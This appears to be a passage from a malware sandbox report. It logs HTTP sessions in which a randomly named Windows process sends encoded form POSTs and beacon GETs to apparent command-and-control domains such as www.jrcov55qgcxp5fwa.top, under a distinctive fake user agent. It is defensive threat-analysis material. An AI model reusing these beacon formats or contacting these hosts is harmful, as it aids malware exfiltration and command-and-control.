                                                                      23192.168.2.45002684.32.84.32805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:32.020803928 CET10857OUTPOST /hqr6/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.nosolofichas.online
                                                                      Origin: http://www.nosolofichas.online
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 10302
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.nosolofichas.online/hqr6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 2b 56 63 44 7a 41 4e 33 33 4e 6b 4b 4c 71 37 6f 51 33 36 4b 32 66 67 36 4d 6e 49 6b 2f 6b 30 77 53 2b 6c 73 57 4c 2f 2f 5a 67 4b 31 57 68 54 68 37 30 6f 41 53 68 6b 4a 49 7a 33 76 45 39 75 5a 4e 63 49 4f 6b 54 32 63 38 4e 4f 4c 4b 6c 39 62 79 6d 6e 35 64 2b 47 41 79 45 48 34 4f 50 42 7a 77 4b 39 76 37 77 4e 2b 2f 55 6a 76 75 32 32 4d 36 59 6e 78 70 6a 48 50 33 70 75 6c 5a 71 61 58 47 64 4f 73 70 70 38 35 36 76 56 2f 42 37 39 53 72 4e 79 50 5a 58 63 4f 35 44 45 4f 68 4b 4f 6b 39 6c 30 79 49 68 4e 6d 6a 58 2b 41 63 30 33 6f 41 32 67 42 7a 47 76 54 51 72 4e 48 44 31 39 6a 43 73 6c 36 59 2b 78 34 55 54 34 6b 51 64 6d 37 61 74 67 34 73 78 64 63 47 68 6d 59 64 48 64 76 31 74 55 65 6d 72 46 47 43 57 49 47 7a 6b 7a 6c 33 34 46 6c 73 79 4e 31 47 39 72 58 73 56 4d 4f 53 51 35 53 6b 31 49 4b 71 33 6c 33 72 70 6d 62 37 53 53 77 74 4a 61 30 69 72 55 4e 66 43 68 55 4a 73 2b 77 4d 4b 44 4d 79 30 41 74 63 39 6d 6d 6d 42 73 68 79 43 44 43 79 47 58 58 62 6e 4b 34 36 78 58 77 42 79 71 31 4d 6e 70 4f [TRUNCATED]
                                                                      Data Ascii: 88v07=+VcDzAN33NkKLq7oQ36K2fg6MnIk/k0wS+lsWL//ZgK1WhTh70oAShkJIz3vE9uZNcIOkT2c8NOLKl9bymn5d+GAyEH4OPBzwK9v7wN+/Ujvu22M6YnxpjHP3pulZqaXGdOspp856vV/B79SrNyPZXcO5DEOhKOk9l0yIhNmjX+Ac03oA2gBzGvTQrNHD19jCsl6Y+x4UT4kQdm7atg4sxdcGhmYdHdv1tUemrFGCWIGzkzl34FlsyN1G9rXsVMOSQ5Sk1IKq3l3rpmb7SSwtJa0irUNfChUJs+wMKDMy0Atc9mmmBshyCDCyGXXbnK46xXwByq1MnpOGCrKiKTS3NCFO89sHNAmtrIYxyCs0NQhTGmhcLCRSo2JYIvTh/RO3K1XlUifc8AGkK3iz3jnaNlTGv4W5sj/Kwk1qjrXs9AX0aMAwIvl9cLfGB+P5IkzgWzhsEx47S+hd/trV3gf82e+Te3eUfdSjyRt7kXTIeAMdiOI17j9d5RhPumeLuaeCnr+jkXQYDWzclU3BlXlnZQhF4+TqXbPKV0d5ENwZbT3M8N1dPkVtrtLbG3P6A21Pb/sC5jLVODFrwrMsac/NlX47UmjyVC69Yilu6IyN3O1BhYCGIu40ux1M70UmQ7+oKG8gIvdpOJQS2Jm8pyEKSoDBTIHXTukxggv/iCOBYuG8QtOforMiCcke24lEd9F6WS/zmWg0MqGxWokJY65msJbmwAil1zPRcxtebXXFpgIrM9l/5FgNM47TtScqLtgT+d5JJBG0ti8aymMuS6Q5diBDbWi3T5Be8q9sW6c7AkbsCm9nmhNFq94OhTf8NhrT1L6vfk9yf/rUTBsNLgE+t/M0lbJjNRERT3bneDNGen0OEkAYuNUlSSwNTlySzmYhWVmkZwDg42d4MAKoA12IeT9EK2QD7iRLUlVZUv6nRevzeS3uCjwyDfa3pQ01Tz+EoSOKXvAlK+U/swduHz872m48KEUSiG1z6DGtpGrMwI2pF [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.45002784.32.84.32805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:34.681804895 CET473OUTGET /hqr6/?O2=aP0Tt&88v07=zX0jw1Jb7ql8GILhT0OEiPF9MmsqzXR3TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfc2GyGCINcJGtLdg83h47wzEv1WJs4WWtSs= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.nosolofichas.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 09:40:35.082451105 CET1236INHTTP/1.1 200 OK
                                                                      Date: Mon, 13 Jan 2025 08:40:35 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 9973
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Server: hcdn
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      x-hcdn-request-id: 8b68ad440ace0cb396ab74f577821258-bos-edge2
                                                                      Expires: Mon, 13 Jan 2025 08:40:34 GMT
                                                                      Cache-Control: no-cache
                                                                      Accept-Ranges: bytes
                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                      Jan 13, 2025 09:40:35.082475901 CET224INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                      Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30
                                                                      Jan 13, 2025 09:40:35.082494974 CET1236INData Raw: 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74 2d
                                                                      Data Ascii: px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:0
                                                                      Jan 13, 2025 09:40:35.082511902 CET1236INData Raw: 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f 72
                                                                      Data Ascii: lign:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px;
                                                                      Jan 13, 2025 09:40:35.082542896 CET1236INData Raw: 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30
                                                                      Data Ascii: align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{disp
                                                                      Jan 13, 2025 09:40:35.082566023 CET1236INData Raw: 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 20 72 65 6c 3d 6e 6f 66 6f
                                                                      Data Ascii: cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidden=true class
                                                                      Jan 13, 2025 09:40:35.082581997 CET896INData Raw: 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69
                                                                      Data Ascii: f=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any
                                                                      Jan 13, 2025 09:40:35.082598925 CET1236INData Raw: 6f 64 65 3d 6e 65 77 20 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b
                                                                      Data Ascii: ode=new function(){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 seq
                                                                      Jan 13, 2025 09:40:35.082628965 CET1236INData Raw: 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f
                                                                      Data Ascii: throw RangeError("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.len
                                                                      Jan 13, 2025 09:40:35.082638979 CET540INData Raw: 43 68 61 72 43 6f 64 65 28 65 28 70 2c 61 26 26 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68
                                                                      Data Ascii: CharCode(e(p,a&&w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.450028134.122.135.48805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:40.634567976 CET758OUTPOST /jpjz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.jrcov55qgcxp5fwa.top
                                                                      Origin: http://www.jrcov55qgcxp5fwa.top
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 202
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6e 69 76 66 44 2b 49 74 6b 2b 39 75 44 7a 34 77 6d 6e 6c 75 54 44 6b 32 33 57 6c 47 2f 7a 70 78 37 5a 72 6d 79 56 69 77 7a 55 4f 50 31 7a 31 51 4d 46 72 52 77 69 68 2f 6f 56 68 4b 4a 6f 65 57 78 4e 62 59 6a 34 58 64 66 53 57 67 4a 62 7a 58 59 6a 32 47 6a 70 32 71 69 54 75 64 6d 47 61 54 4e 66 57 52 39 67 61 65 4c 75 57 65 47 7a 64 72 43 5a 42 4a 4f 4e 62 6f 34 4c 41 6b 48 6d 58 50 6a 77 4c 4a 78 4c 53 64 48 35 36 31 76 71 5a 62 55 66 7a 64 74 68 34 69 73 73 6a 46 6c 59 4e 43 30 31 52 44 46 55 71 38 75 50 52 75 48 42 75 45 34 7a 37 44 66 51 3d 3d
                                                                      Data Ascii: 88v07=Muqh5VPLPtCMnivfD+Itk+9uDz4wmnluTDk23WlG/zpx7ZrmyViwzUOP1z1QMFrRwih/oVhKJoeWxNbYj4XdfSWgJbzXYj2Gjp2qiTudmGaTNfWR9gaeLuWeGzdrCZBJONbo4LAkHmXPjwLJxLSdH561vqZbUfzdth4issjFlYNC01RDFUq8uPRuHBuE4z7DfQ==
                                                                      Jan 13, 2025 09:40:41.534905910 CET306INHTTP/1.1 404 Not Found
                                                                      Content-Length: 146
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 08:40:41 GMT
                                                                      Server: nginx
                                                                      X-Cache: BYPASS
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.450029134.122.135.48805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:43.188040972 CET778OUTPOST /jpjz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.jrcov55qgcxp5fwa.top
                                                                      Origin: http://www.jrcov55qgcxp5fwa.top
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 222
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6d 42 6e 66 42 5a 6b 74 69 65 39 74 61 54 34 77 7a 58 6c 71 54 44 6f 32 33 58 68 57 2f 6d 35 78 36 38 58 6d 7a 51 4f 77 6d 55 4f 50 74 6a 31 52 52 31 72 4b 77 69 6b 4b 6f 51 5a 4b 4a 6f 4b 57 78 50 7a 59 6a 72 2f 53 65 43 57 69 46 37 7a 56 57 44 32 47 6a 70 32 71 69 54 37 56 6d 47 53 54 52 2b 6d 52 76 53 79 64 49 75 57 64 48 7a 64 72 55 70 42 4e 4f 4e 61 4c 34 4f 5a 35 48 6a 54 50 6a 31 6e 4a 79 61 53 65 65 4a 36 7a 72 71 59 50 54 2f 2b 47 73 55 30 6f 73 4d 6a 39 76 35 31 48 78 7a 63 5a 55 6c 4c 72 38 50 31 64 61 47 6e 77 31 77 47 4b 45 62 44 65 34 42 2f 55 58 52 73 41 32 4e 6f 6b 70 41 4c 50 42 6e 45 3d
                                                                      Data Ascii: 88v07=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/m5x68XmzQOwmUOPtj1RR1rKwikKoQZKJoKWxPzYjr/SeCWiF7zVWD2Gjp2qiT7VmGSTR+mRvSydIuWdHzdrUpBNONaL4OZ5HjTPj1nJyaSeeJ6zrqYPT/+GsU0osMj9v51HxzcZUlLr8P1daGnw1wGKEbDe4B/UXRsA2NokpALPBnE=
                                                                      Jan 13, 2025 09:40:44.068327904 CET306INHTTP/1.1 404 Not Found
                                                                      Content-Length: 146
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 08:40:43 GMT
                                                                      Server: nginx
                                                                      X-Cache: BYPASS
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.450030134.122.135.48805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:45.735991001 CET10860OUTPOST /jpjz/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Host: www.jrcov55qgcxp5fwa.top
                                                                      Origin: http://www.jrcov55qgcxp5fwa.top
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 10302
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Data Raw: 38 38 76 30 37 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6d 42 6e 66 42 5a 6b 74 69 65 39 74 61 54 34 77 7a 58 6c 71 54 44 6f 32 33 58 68 57 2f 6d 78 78 37 4f 76 6d 79 33 61 77 67 6b 4f 50 6c 44 31 4d 52 31 72 4c 77 69 63 52 6f 51 6c 30 4a 74 4f 57 77 75 54 59 30 4b 2f 53 51 43 57 69 4e 62 7a 57 59 6a 32 54 6a 70 6d 6d 69 54 72 56 6d 47 53 54 52 38 2b 52 74 41 61 64 4f 75 57 65 47 7a 64 6e 43 5a 42 70 4f 4e 7a 77 34 4f 55 4f 48 51 72 50 67 56 33 4a 30 6f 36 65 57 4a 36 78 6d 4b 59 48 54 2f 79 6a 73 55 42 58 73 50 2f 62 76 35 52 48 38 45 78 34 4a 68 4c 57 67 39 39 44 61 47 66 33 37 51 65 5a 63 72 54 32 75 52 4c 66 41 6a 59 57 35 63 67 68 33 52 4f 4d 66 67 4b 70 52 61 46 50 64 2b 6f 4b 58 53 41 2f 72 54 73 4c 49 6a 74 2b 71 2f 31 44 46 4a 54 69 6f 53 57 47 57 63 30 39 53 4b 4f 56 76 47 67 44 58 44 76 62 52 46 52 2b 35 70 57 35 48 49 47 4b 49 4d 2b 6e 45 71 43 46 67 4d 67 44 67 36 6b 4d 59 51 50 61 50 73 69 69 49 54 43 4e 4d 6c 55 71 4b 77 42 63 4e 7a 6a 6f 35 69 62 6c 2f 6f 2b 4a 47 34 30 64 50 66 4f 64 [TRUNCATED]
                                                                      Data Ascii: 88v07=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/mxx7Ovmy3awgkOPlD1MR1rLwicRoQl0JtOWwuTY0K/SQCWiNbzWYj2TjpmmiTrVmGSTR8+RtAadOuWeGzdnCZBpONzw4OUOHQrPgV3J0o6eWJ6xmKYHT/yjsUBXsP/bv5RH8Ex4JhLWg99DaGf37QeZcrT2uRLfAjYW5cgh3ROMfgKpRaFPd+oKXSA/rTsLIjt+q/1DFJTioSWGWc09SKOVvGgDXDvbRFR+5pW5HIGKIM+nEqCFgMgDg6kMYQPaPsiiITCNMlUqKwBcNzjo5ibl/o+JG40dPfOdnR8NCtf57+8IUtqRfPrkS3Ww91b9O8vadDEbwWGO+LOze3nxM79hS9e1Ceq22fplofMGSZUbhY25gw44umedgHQmW17wpNIWpPxD/BLA97MvXHUolSS7N6K1ebPhASjJ4r6iwbJO+GyPxEZF/kYHqVt7xEhSQcHeHa3S/A4ZIAlqAbBLKe7GpzQtfSAmY/HfkJeUq5mFWkrF+YGstPV8Q8zZu3uKr/trDW1J3Iy2WadOX+9dSx6uuONU+sd+XWcNQVKbI9fsVUvc9G+a8HeSTPvj/q7E10Z+pdkR5cuW58bBl2phzhx7bnHhbt+vmYBo1S7ULi62z8CGh4UxddSWAFmOBJGbfWE+wa5jc6PVhvgIL1dvzAaANpRydopOOb3mevDGvVzAQggQYBoKs3aJrW9Vboxu7tZEGRicoBeKOuyy+ZAHheZz+ALNgK1j2hdRqY9+IdSgTb5bueJvVwFX9SBUv0cvrs4S7xHS9hY5o4hmKus6WQCQ56VSreWuNAQq4Iif5UIFhJrPBg7OV9xvqzNZfO0GMB7kKb75Xb9YOo67n8qDRysvyOUncb73uLrWw6aMAEKf+6FHAe5SNxmTzXhmEEe5fTj643wqe3ceT3zP7wolKjhY8XXFmYsIR4sBNzzniC4Jw0wgh6sYAmVMQs73qtUrNk0nWx [TRUNCATED]
                                                                      Jan 13, 2025 09:40:46.607937098 CET306INHTTP/1.1 404 Not Found
                                                                      Content-Length: 146
                                                                      Content-Type: text/html
                                                                      Date: Mon, 13 Jan 2025 08:40:46 GMT
                                                                      Server: nginx
                                                                      X-Cache: BYPASS
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.450031134.122.135.48805816C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 13, 2025 09:40:48.279449940 CET474OUTGET /jpjz/?88v07=BsCB6j6XIP/wuAbzMvYD7rFnMTUj3QEoDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcVAurUdDQdDmms6nVhCqDqAG2cNeT9xHcOvE=&O2=aP0Tt HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US
                                                                      Host: www.jrcov55qgcxp5fwa.top
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                      Jan 13, 2025 09:40:49.173002005 CET306INHTTP/1.1 404 Not Found
